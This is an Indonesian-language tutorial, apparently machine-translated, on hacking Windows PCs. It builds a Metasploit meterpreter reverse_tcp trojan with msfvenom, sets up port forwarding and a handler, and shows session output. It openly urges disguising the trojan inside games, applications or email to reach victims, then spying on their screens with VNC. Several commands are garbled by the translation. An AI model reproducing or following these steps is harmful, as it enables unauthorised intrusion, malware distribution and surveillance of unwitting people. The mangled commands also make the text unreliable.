Microsoft mengklaim bahwa windows 10 telah memperbaiki semua kerentanan keamanan. Kita bisa hack windows PC dengan remote exploit seperti "ms08_067_netapi" lagi. Windows telah memperbaiki kerentanan itu. sangat sedih. Tunggu sebentar, Lalu bagaimana kita bisa hack windows pc itu bahkan mungkin sekarang? Jawabannya adalah ya, mesin windows masih rentan terhadap serangan Trojan terlepas dari versinya. Dengan metode ini Anda bisa membobol semua mesin windows 10,8.1,8,7, vista dan xp.
Sebuah trojan atau backdoor dapat memberikan akses ke mesin target dari jarak jauh. Kita semua tahu itu, saya tidak akan terlalu dalam untuk menjelaskan apa itu trojan. Disini kita akan menggunakan trojan reverse_tcp. Ini adalah malware khusus yang membuat koneksi jarak jauh ke mesin hacker melalui Protokol Kontrol Transisi dari mesin korban. Hal ini memungkinkan hacker untuk masuk ke mesin dan mengendalikannya sepenuhnya.
Metasploit framework adalah salah satu tool terbaik yang saya sukai di kali linux. Ini memiliki generator handler dan payload. Setelah payload dijalankan pada mesin target saat kita sedang mendengarkan mode di bagian handler, ia menumbuhkan sebuah shell meterpreter. Shell meterpreter ini memungkinkan kita untuk berkomunikasi dengan sistem target dan mengeksekusi perintah shell. Dibandingkan dengan pengukur meter shell biasa ada banyak pilihan. Ini bisa dilakukan saat target berada di jaringan LAN yang sama atau melalui internet, tidak ada bedanya anda hanya perlu mengkonfigurasi router dan payload yang sesuai. Proses ini mati sederhana. Ikuti langkah-langkahnya.
Video Demo
Konfigurasi Router
Langkah ini sangat penting bila target anda sudah lewat internet atau WAN. Abaikan langkah ini jika target Anda berada di LAN yang sama. Untuk hack pc melalui internet berarti Anda harus berkomunikasi di kedua arah. Untuk melakukan ini, router / modem Anda harus membuka port mesin Anda. Ini disebut port forwarding. Secara default semua port ditutup oleh router / modem anda. Buka browser ke url http://192.168.1.1 Ketik username dan password anda (secara default password dan username akan menjadi " admin"). Ini akan membawa Anda ke pengaturan router. Buka Pengaturan lanjutan menemukan port forwarding. Sekarang klik add new set start dan end port menjadi 444 (karena kita menggunakan port 444 pada metasploit). Di kolom alamat Ip Anda harus mengetikkan ip internal mesin linux Anda. Simpan Pengaturan. kamu selesai. Anda dapat memeriksa ulang dengan memindai port Anda dengan pemindai port online.
Menghasilkan Trojan
Buat payload menggunakan msfvenom. atur port ke 444 dan ip ke IP publik atau IP lokal Anda tergantung pada target Anda. Trojan yang dihasilkan akan mencoba terhubung ke IP dan port ini saat dieksekusi. Perintah berikut akan menghasilkan trojan dalam format .exe.
# msfvenom -p windows / meterpreter / reverse_tcp - platform windows-a x86 -f exe LHOST = "ip penyerang" LPORT = 444 -o /root/Desktop/trojan.exe
Sebuah trojan akan dihasilkan di desktop. sisihkan dan beralih ke bagian handler. jalankan metasploit dan ikuti langkahnya.
# msfconsole
Tunggu sebentar, msfconsole akan muncul. Gunakan handler lalu, set payload dan port.
1. Handler
msf> gunakan multi / handler
2. set payload
msf exploit (handler)> atur jendela PAYLOAD / meterpreter / reverse_tcp
3. Setel port lokal
msf exploit (handler)> atur LPORT 444
4. Tetapkan host lokal
msf exploit (handler)> set LHOST "attacker ip"
5. memanfaatkan
msf exploit (handler)> exploit
Tunggu target untuk menghubungkan kembali
msf exploit (handler)> exploit
[*] Memulai handler terbalik di 192.168.1.104:444
[*] Memulai handler payload ...
[*] Memulai handler terbalik di 192.168.1.104:444
[*] Memulai handler payload ...
Jalankan muatannya
Sekarang Anda harus menjalankan trojan Anda pada sistem target. Mendistribusikan file exe mentah adalah ide yang buruk, lebih baik menyandikannya dan melampirkan aplikasi normal atau permainan atau bahkan email. Setelah keluar trojan masuk dan dieksekusi sesi meterpreter akan ditelurkan.
[*] Memulai penangan mundur di 192.168.1.104:444
[*] Memulai penangan muatan ...
[*] Mengirim panggung (83170 bytes) ke 192.168.1.105
[*] Sesi Meterpreter 1 dibuka (192.168.1.104:444 -> 192.168. 1.105: 36028) pada 2016-05-20 03:20:45 -0500
meterpreter>
[*] Memulai penangan muatan ...
[*] Mengirim panggung (83170 bytes) ke 192.168.1.105
[*] Sesi Meterpreter 1 dibuka (192.168.1.104:444 -> 192.168. 1.105: 36028) pada 2016-05-20 03:20:45 -0500
meterpreter>
Sesi Meterpreter memungkinkan Anda untuk menjalankan perintah sistem, perintah jaringan, memata-matai layar dan banyak lagi.
gunakan perintah help untuk melihat keseluruhan daftar perintah
meterpreter> bantuan
Gunakan perintah ini untuk menjalankan sesi vnc dan memata-matai target
meterpreter> run vnc
Seluruh proses ini sederhana namun, bagian terberat adalah mendapatkan trojan ke pengguna target. Melampirkan file beserta game karya hebat.